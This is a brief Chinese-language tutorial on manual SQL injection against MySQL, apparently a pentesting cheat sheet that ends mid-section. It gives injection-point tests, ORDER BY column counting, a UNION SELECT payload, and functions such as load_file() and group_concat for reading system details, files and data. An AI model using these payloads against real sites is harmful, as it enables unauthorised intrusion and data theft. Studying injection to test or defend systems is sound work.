通用Sql注入
通常判断是否有SQL注入点用单引号
一.通用的SQL注入漏洞分为两种类型:
- 数字型
数字型判断:and 1=1 和and 1=2
- 字符型
字符型判断:and ‘1’=’1’ 和and ‘1’=’2
二.猜测字段(表的列数)
Order by 任意数字
三.用union查询语句查询报错回显位置
?id=-1’ union select (表的列数) %23(注释符)
四.查询
相关函数:
system_user() 系统用户名
user() 用户名
current_user 当前用户名
session_user()连接数据库的用户名
database() 数据库名
version() MYSQL数据库版本
load_file() MYSQL读取本地文件的函数
@@datadir 读取数据库路径
@@basedir MYSQL 安装路径
@@version_compile_os 操作系统
多条数据显示函数:
concat()
group_concat()
concat_ws()
五. 常规查询(数字型):
?id=-1’